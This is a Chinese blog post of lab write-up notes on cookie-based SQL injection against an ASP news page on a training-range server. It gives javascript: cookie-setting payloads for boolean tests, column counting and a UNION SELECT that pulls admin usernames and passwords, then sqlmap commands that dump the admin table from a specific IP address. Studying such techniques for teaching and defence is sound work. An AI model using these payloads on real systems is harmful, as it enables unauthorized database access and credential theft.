cookie注入

最新推荐文章于 2023-10-13 13:37:27 发布
最新推荐文章于 2023-10-13 13:37:27 发布
阅读量1k 收藏 9
点赞数 2
分类专栏: sql注入 文章标签: cookie注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/85074598
版权

有个靶场上的一道题,只要在id后面进行测试,立马弹窗,得不到任何信息。

这是个很好的WAF过滤,一个asp的网页,所以用cookie注入。

asp网页能用cookie注入,php不能。

(语句执行在url地址栏里,每次注入语句执行后,都要访问对应的asp文件,才会出结果,就是刷新一下就行)

javascript:alert(document.cookie="id="+escape("171"));  (注意最后面有个分号)

尝试后有弹窗

1.判断有没有注入漏洞

javascript:alert(document.cookie="id="+escape("171 and 1=1"));返回正常
javascript:alert(document.cookie="id="+escape("171 and 1=2"));返回异常

说明存在注入漏洞。

2.爆字段

javascript:alert(document.cookie="id="+escape("171 order by 1"));
..........
javascript:alert(document.cookie="id="+escape("171 order by 10"));
javascript:alert(document.cookie="id="+escape("171 order by 11"));此处错误
说明有10个字段

2.爆表名(这个网站的库已知,为admin)

javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));

 这里发现发布者为7,发布时间为8,是最有可能查询到账号和密码的地方。

3.爆内容(网站已知账号、密码在库中分别为username、password)

javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,username,password,9,10 from admin"));

这就出了username和password。

 

使用sqlmap进行cookie注入:

1.测试是否有注入点:

sqlmap.py -u"http://120.203.13.75:8001/shownews.asp" --cookie "id=171" --level 2

2.爆表

sqlmap.py -u"http://120.203.13.75:8001/shownews.asp" --cookie "id=171" --tables --level 2

3.爆列名(假设爆出admin表)

sqlmap.py -u"http://120.203.13.75:8001/shownews.asp" --cookie "id=171" --columns -T admin --level 2

4.爆内容

sqlmap.py -u"http://120.203.13.75:8001/shownews.asp" --cookie "id=171" --dump -T admin -C "username,password" --level 2

 

大千SS
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【SQL注入cookie注入:原理、步骤、示例
07-08 4368
【SQL-cookie注入
cookie 注入
白菜执笔人的博客
03-01 528
Web安全攻防 学习笔记 一、cookie 注入 1.1、HTTP 头中的注入介绍         服务器可以利用 cookies 包含信息的任意性来筛选并经常性维护这些信息,以判断在 HTTP 传 输中的状态。cookies 最经典的应用就是判断用户是否已经登录网站。 1.2、cookie 注入 代码中使用 Cookie 传递参数,但是没有对 Coo...
cookies注入漏洞
weixin_30512785的博客
07-28 231
嘿嘿,我的方法和linzi一样,当然是用cookies提交啦。我以前写过一篇文章《安全检测时发现的一些漏洞》,其中有一段就是针对的这种情况,我把它摘录过来,希望有用:----------------------------------------------------------------------------------------------------------------...
渗透测试---手把手教你SQL注入(5)---Cookie注入,宽字节注入与堆叠注入
最新发布
weixin_52796034的博客
10-13 440
在SQL注入中,尤其是使用ASP的网站中,Cookie注入是一种常见的攻击方式。Cookie是Web应用程序在客户端计算机上存储的小型数据片段,用于跟踪用户会话状态和存储其他个性化信息。有时我们可以通过在Cookie注入恶意代码来绕过一些安全措施,并执行恶意的SQL查询。
关于cookie注入
告白的博客
07-07 368
0x00 关于cookie注入介绍 cookie注入也称作加解密注入,账户信息等可能通过加密传输,可通过抓包获取cookie信息,以及对源码分析信息结果加密后传入传出数据库,通过寻找其相关的加密方式,使注入语句加密进行注入 0x01 sqil-20-21cookie示例 通过bur抓取数据包发现cookie信息,less-20使用cookie传输但未作加密,直接在数据包通过cookie位置进行注入注入方式参考前面的联合注入,即可注入成功 -admin' union select 1,(select gro
cookie注入源码
04-24
cookie注入源码 asp cookie注入源码 cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了。
Cookie 注入是怎样产生的
09-06
现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题!所以就有了Cookies注入~~
cookie注入工具
06-03
cookie注入工具,方便网管对进行安全检测用
第十六节 Cookie注入-01
09-15
Cookie 注入攻击详解 Cookie 是一种小型文本文件,存于用户的计算机上,用于存储用户信息,以便服务器在后续访问时能够识别用户的身份。Cookie 的主要功能是:判定注册用户是否已经登录网站,用户可能会得到提示,...
可以修改Cookies和注入的浏览器
08-12
可以修改cookis的浏览器软件,可以修改cookis欺骗,用这种方法可以入侵很多网站,本人一直在用,软件原名:Cookies&Inject Browser
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1198
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
js-cookie的使用
weixin_52615140的博客
01-04 9244
关于js-cookie的那些事,js-cookie的使用
【SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 1816
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
渗透第二课解题过程
qq_37327261的博客
02-26 304
重要说明:本文作为学习笔记,仅用于学习交流,请勿用于其它用途,侵删。 目标靶场:http://120.203.13.75:8001/shownews.asp?id=171,此靶场是腾讯课堂免费课程中的演习靶场,此笔记较为基础,请大牛勿喷 第二课是基于第一课所学的知识上进一步学习渗透,所以如果哪里我一笔带过没有详细说明,那就意味着该知识点为之前笔记的知识。 这次的笔记讲的是如果目标站点有WAF...
Cookie注入是怎样产生的
0ffs3t
12-21 687
作者:啊D         现在很多网站都加了通用防注入系统代码,你输入注入语句将无法注入,咋一看,感觉这样的防注入系统不错,但防注入一般只对QueryString和Form做了防范,却忽略了Cookies 的问题!所以Cookies注入就产生了。         首先,我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道ID=Request.QueryS
关于sql注入cookie注入
热门推荐
我的天,bug!
06-08 1万+
INFO:sql注入我想很多人都接触过,大多数都是接触得get 和post注入的形式,你或是用手工,或是用工具,cookie注入也是一样,今天就给大家讲一讲cookie如何注入,考虑到大家的实际情况,这里就不通过手工来进行,我们就借助一些工具来完成。(大牛看到请不要打我~~) 小知识:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服
关于Cookie注入学习心得
x_nirvana的博客
12-10 4821
一,Cookie的来源和作用                  Cookie最先是由Netscape(网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。就是某些网站为了辨别网站用户身份而进行对session追踪结果的记录,浏览器不同Cookie存储的位置也不尽相同。而Cookie的作用则很
Cookie注入漏洞 + 数据库备份getshell——漏洞复现
W小哥
01-05 1565
一、环境搭建 网站源码在我的资源中,是:南方数据企业网站管理系统,下载后,使用iis平台搭建 二、漏洞复现 假设我们通过网站的sql注入漏洞,注入出用户名admin、密码admin123,登录网站后台如下图所示: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值